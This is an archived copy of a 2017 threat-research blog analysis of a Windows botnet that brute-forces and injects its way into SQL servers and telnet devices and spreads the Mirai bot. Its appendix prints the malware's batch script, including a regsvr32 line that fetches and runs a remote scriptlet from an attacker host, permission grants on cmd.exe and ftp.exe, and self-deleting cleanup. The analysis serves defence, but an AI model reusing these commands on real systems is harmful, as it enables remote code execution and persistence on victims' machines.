{
	"id": "86fe2443-1bad-416e-92ab-a012a1907c70",
	"created_at": "2026-04-06T00:20:08.581839Z",
	"updated_at": "2026-04-10T13:11:33.820675Z",
	"deleted_at": null,
	"sha1_hash": "3715f938027226f626ac630ade6d976f60b1e172",
	"title": "New(ish) Mirai Spreader Poses New Risks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 288667,
	"plain_text": "New(ish) Mirai Spreader Poses New Risks\r\nBy GReAT\r\nPublished: 2017-02-21 · Archived: 2026-04-05 14:58:13 UTC\r\nA cross-platform win32-based Mirai spreader and botnet is in the wild and previously discussed publicly.\r\nHowever, there is much information confused together, as if an entirely new IoT bot is spreading to and from\r\nWindows devices. This is not the case. Instead, an accurate assessment is that a previously active Windows botnet\r\nis spreading a Mirai bot variant. So let’s make a level-headed assessment of what is really out there.\r\nThe earliest we observed this spreader variant pushing Mirai downloaders was January 2017. But this Windows\r\nbot is not new. The Windows bot’s spreading method for Mirai is very limited as well – it only delivers the Mirai\r\nbots to a Linux host from a Windows host if it successfully brute forces a remote telnet connection. So we don’t\r\nhave a sensational hop from Linux Mirai to Windows Mirai just yet, that’s just a silly statement. But we do have a\r\nnew threat and practical leverage of the monolithic Windows platform to further spread Mirai to previously\r\nunavailable resources. In particular, vulnerable SQL servers running on Windows can be a problem, because they\r\ncan be Internet facing, and have access to private network connecting IP-based cameras, DVR, media center\r\nsoftware, and other internal devices.\r\nSo, we observe a previously active bot family that now spreads Mirai bots to embedded Linux systems over a very\r\nlimited delivery vector. It spreads both its own bot code and the new Mirai addition in stages, using multiple web\r\nresources and servers. These servers help provide a better timeline of operation for the operator. One of the\r\ndirectly related web hosts at downs.b591[.]com has been serving bot components since at least August 2014. And\r\nmost of the bot’s functionality clearly traces back to public sources at least as early as 2013. 
It’s not the freshest\r\ncode or the most impressive leap.\r\nRegardless, it’s unfortunate to see any sort of Mirai crossover between the Linux platform and the Windows\r\nplatform. Much like the Zeus banking trojan source code release that brought years of problems for the online\r\ncommunity, the Mirai IoT bot source code release is going to bring heavy problems to the internet infrastructure\r\nfor years to come, and this is just a minor start.\r\nNotably, the 2016 Mirai operations were unique for two reasons:\r\nnewly practical exploitation and misuse of IoT devices (mainly DVRs, CCTV cameras, and home routers)\r\non a large scale\r\nrecord-setting DDoS traffic generation, exceeding all previous volumes\r\nThe great volume of this Mirai-generated DDoS traffic in October 2016 took down a portion of the internet, and\r\nwas severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out nation\r\nstates’ activity due to the overall power of the Mirai botnets. But even those attacks were far from the work of\r\nnation states. Only time will tell if nation states choose to hide their destructive activity in plain sight in the\r\nInternet of Things – the capabilities are clearly available. Could we see a nation state interested in taking down\r\nwide swaths of the internet using this juvenile toolset? It’s very possible.\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 1 of 11\n\nIn response to the huge problem this poses to the internet infrastructure, over the past few months, our team and\r\nCERT have participated in multiple successful command-and-control takedown efforts against infrastructure that would otherwise\r\nhave continued to pose problems for partners simply providing notifications. While some security researchers may describe these\r\ntakedowns as “whack a mole”, these efforts resulted in relief from Gbps DDoS storms for major networks. And\r\nwe are happy to partner with more network operators to leverage our connections with CERTs, LE, and other\r\npartners around the world to further enable this success.\r\nThe Windows Spreader – Who What Where\r\nThis Windows bot code is richer and more robust than the Mirai codebase, with a large set of spreading\r\ntechniques, including brute-forcing over telnet, SSH, WMI, SQL injection, and IPC techniques. Some of the bot\r\nexecutables are signed with certificates stolen from Chinese manufacturers. The code runs on Windows boxes, and\r\nchecks in to a hardcoded list of C2 servers for hosts to scan and attack. Upon successful intrusion, it can spread the Linux\r\nMirai variant as needed over telnet. If tftp or wget are not present on the remote system, it attempts to copy a\r\ndownloader to the system and executes it there. This downloader will pull down and execute the final Mirai bot.\r\nThe Linux devices it reaches over telnet include\r\nIP-based cameras\r\nDVR\r\nMedia center appliances\r\nVarious Raspberry Pi and Banana Pi devices\r\nUnfortunately, this code is clearly the work of a more experienced bot herder, new to the Mirai game, and possibly\r\none that is not juvenile like the original Mirai operator set. Based on multiple artefacts (the word choice in\r\nstring artefacts, the code having been compiled on a Chinese system, the host servers being maintained in\r\nTaiwan, the abuse of stolen code-signing certificates exclusively from Chinese companies, and other characteristics), it\r\nis likely that this developer/operator is Chinese speaking.\r\nThe addition of a Chinese-speaking malware author with access to stolen code-signing certificates, with the ability\r\nto rip win32 offensive code from multiple offensive projects effective against MSSQL servers around the world,\r\nand the ability to port the code into an effective cross-platform spreading bot, introduces a step up from the\r\njuvenile, stagnating, but destructive Mirai botnet operations of 2016. It introduces newly available systems and\r\nnetworks for the further spread of Mirai bots. And it demonstrates the slow maturing of Mirai now that the source\r\nis publicly available.\r\nBelow is a proportional comparison of the second-stage component’s IP geolocations\r\n(fb7b79e9337565965303c159f399f41b), frequently downloaded by vulnerable MSSQL and MySQL servers. It is\r\nserved from one of two web hosts, both hosted in Taiwan:\r\nhttp://down.mykings[.]pw:8888/ups.rar\r\nhttp://up.mykings[.]pw:8888/ups.rar\r\nWhen downloaded, it is copied to disk with one of several filenames and executed:\r\ncab.exe, ms.exe, cftmon.exe\r\nClearly, emerging markets with heavy investment in technology solutions are hit the heaviest by this component.\r\nComponents\r\nThe bot code and various components have been pulled together from other projects and previous sources. At\r\nruntime, code delivery occurs in a series of stages, from scanning and attacking online resources to downloading\r\nadditional configuration files, fetching further instructions, and downloading and running additional executable\r\ncode. Again, almost all of these components, techniques, and functionality are several years old and are very large\r\nfile objects.\r\nWindows Spreader Infection Process\r\ni.e. c:\\windows\\system\\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)\r\nChanges DNS settings to 114.114.114.114, 8.8.8.8.\r\nDownloads and executes\r\nfrom hxxp://up.mykings[.]pw:8888/update.txt (02b0021e6cd5f82b8340ad37edc742a0)\r\nhxxp://up.mykings[.]pw:8888/ver.txt (bf3b211fa17a0eb4ca5dcdee4e0d1256)\r\nDownloads\r\nhxxp://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg\r\n(b27590a4b89d31dc0210c3158b82c175) to c:\\windows\\system\\msinfo.exe\r\n(5707f1e71da33a1ab9fe2796dbe3fc74)\r\nand runs with command-line parameters “-create” “-run”\r\nDownloads and executes hxxp://down.mykings[.]pw:8888/my1.html (64f0f4b45626e855b92a4764de62411b)\r\nThis file is a command shell script that registers a variety of files, including database connectivity libraries, and\r\ncleans up unneeded traces of itself on the system.\r\nhttp://up.mykings[.]pw:8888/ups.rar (10164584800228de0003a37be3a61c4d)\r\nIt copies itself to the tasks directory, and installs itself as a scheduled job.\r\nc:\\windows\\system\\my1.bat\r\nc:\\windows\\tasks\\my1.job\r\nc:\\windows\\system\\upslist.txt\r\nc:\\windows\\system32\\cmd.exe /c sc start xWinWpdSrv\u0026ping 127.0.0.1 -n 6 \u0026\u0026 del\r\nc:\\windows\\system\\msinfo.exe \u003e\u003e NUL\r\nc:\\program files\\kugou2010\\ms.exe (10164584800228de0003a37be3a61c4d)\r\nKeylogger (hosted as comments within jpeg files)\r\nThis botnet operator hosts components embedded within jpeg comments, a technique they have been using since\r\n2013. This technique produces very large file objects. So even a fresh image of Taylor\r\nSwift downloaded by this bot contains 2.3MB of keylogging code first seen 2016.10.30 (ad0496f544762a95af11f9314e434e94):\r\nModular bot code\r\nAlso interesting in this variant is the variety of its spreader capabilities in the form of blind SQLi (SQL injection)\r\nand brute-forcing techniques, compiled in from a “Cracker” library. This library enables “tasking” of various\r\nattacks. The bots are instructed on individual tasks via an encrypted file downloaded from the available C2.\r\n[Cracker:IPC]\r\n[Cracker:MSSQL]\r\n[Cracker:MySQL]\r\n[Cracker:RDP]\r\n[Cracker:SSH]\r\n[Cracker:Telnet]\r\n[Cracker:WMI]\r\nThe Windows bot’s source appears to be developed in a fairly modular manner in C++, as functionality is broken\r\nout across source libraries:\r\nCheckUpdate.cpp\r\nCracker_Inline.cpp\r\nCracker_Standalone.cpp\r\ncService.cpp\r\nCThreadPool.cpp\r\nDb_Mysql.cpp\r\nDispatcher.cpp\r\nIpFetcher.cpp\r\nlibtelnet.cpp\r\nLogger_Stdout.cpp\r\nScanner_Tcp_Connect.cpp\r\nScanner_Tcp_Raw.cpp\r\nServerAgent.cpp\r\nTask_Crack_Ipc.cpp\r\nTask_Crack_Mssql.cpp\r\nTask_Crack_Mysql.cpp\r\nTask_Crack_Rdp.cpp\r\nTask_Crack_Ssh.cpp\r\nTask_Crack_Telnet.cpp\r\nTask_Crack_Wmi.cpp\r\nTask_Scan.cpp\r\nWPD.cpp\r\ncatdbsvc.cpp\r\ncatadnew.cpp\r\ncatdbcli.cpp\r\nwaitsvc.cpp\r\nerrlog.cpp\r\nCode signing certificates\r\nThe code signing certificates appear to be stolen: one from a solar and semiconductor grinding wafer products\r\nmanufacturer in Northwest China, and another that has expired.\r\nKaspersky Lab products detect and prevent infections from these bots.\r\nFile object scan verdicts\r\nTrojan.Win32.SelfDel.ehlq\r\nTrojan.Win32.Agent.ikad\r\nTrojan.Win32.Agentb.btlt\r\nTrojan.Win32.Agentb.budb\r\nTrojan.Win32.Zapchast.ajbs\r\nTrojan.BAT.Starter.hj\r\nTrojan-PSW.Win32.Agent.lsmj\r\nTrojan-Downloader.Win32.Agent.hesn\r\nTrojan-Downloader.Win32.Agent.silgjn\r\nHEUR:Trojan-Downloader.Linux.Gafgyt.b\r\nBackdoor.Win32.Agent.dpeu\r\nDangerousPattern.Multi.Generic (UDS)\r\nBehavioral verdicts\r\nTrojan.Win32.Generic\r\nTrojan.Win32.Bazon.a\r\nTrojan.Win32.Truebadur.a\r\nDangerousObject.Multi.Chupitio.a\r\nAppendix\r\nc2 and url\r\nCertificates\r\nXi’an JingTech electronic Technology Co.,LTD\r\nsn: 65 f9 b9 66 60 ad 34 c1 c1 fe f2 97 26 6a 1b 36\r\nPartner Tech(Shanghai)Co.,Ltd\r\nsn: 26 59 63 33 50 73 23 10 40 17 81 35 53 05 97 60 39 76 89\r\nMd5\r\nContents of http://down.mykings[.]pw:8888/my1.html\r\n@echo off\r\nmode con: cols=13 lines=1\r\nif exist C:\\downs\\runs.exe start C:\\downs\\runs.exe\r\nmd C:\\Progra~1\\shengda\r\nmd C:\\Progra~1\\kugou2010\r\nmd C:\\download\r\nregsvr32 /s shell32.dll\r\nregsvr32 /s WSHom.Ocx\r\nregsvr32 /s scrrun.dll\r\nregsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll\r\nregsvr32 /s jscript.dll\r\nregsvr32 /s vbscript.dll\r\nstart regsvr32 /u /s /i:http://js.f4321y[.]com:280/v.sct scrobj.dll\r\nattrib +s +h C:\\Progra~1\\shengda\r\nattrib +s +h C:\\Progra~1\\kugou2010\r\nattrib +s +h C:\\download\r\ncacls cmd.exe /e /g system:f\r\ncacls cmd.exe /e /g everyone:f\r\ncacls ftp.exe /e /g system:f\r\ncacls ftp.exe /e /g everyone:f\r\ncacls c:\\windows\\help\\akpls.exe /e /g system:f\r\ncacls c:\\windows\\help\\akpls.exe /e /g everyone:f\r\ncacls C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll /e /g system:f\r\ncacls C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll /e /g everyone:f\r\nreg delete “HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v shell /f\r\ndel c:\\windows\\system32\\wbem\\se.bat\r\ndel c:\\windows\\system32\\wbem\\12345.bat\r\ndel c:\\windows\\system32\\wbem\\123456.bat\r\ndel c:\\windows\\system32\\wbem\\1234.bat\r\ndel c:\\windows\\system32\\*.log\r\ndel %0\r\nexit\r\nContents of http://up.mykings[.]pw:8888/update.txt\r\nhttp://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg c:\\windows\\system\\msinfo.exe\r\nhttp://down.mykings[.]pw:8888/my1.html c:\\windows\\system\\my1.bat\r\nRelevant Links\r\nhttps://malwaremusings.com/2013/04/10/a-look-at-some-ms-sql-attacks-overview/\r\nhttps://isc.sans.edu/diary/21543\r\nhttp://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html?m=1\r\nhttps://securelist.com/blog/research/76954/is-mirai-really-as-black-as-its-being-painted/\r\nhttps://threatpost.com/mirai-fueled-iot-botnet-behind-ddos-attacks-on-dns-providers/121475/\r\nhttps://securelist.com/analysis/quarterly-malware-reports/77412/ddos-attacks-in-q4-2016/\r\nSource: https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/"
	],
	"report_names": [
		"newish-mirai-spreader-poses-new-risks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434808,
	"ts_updated_at": 1775826693,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3715f938027226f626ac630ade6d976f60b1e172.pdf",
		"text": "https://archive.orkl.eu/3715f938027226f626ac630ade6d976f60b1e172.txt",
		"img": "https://archive.orkl.eu/3715f938027226f626ac630ade6d976f60b1e172.jpg"
	}
}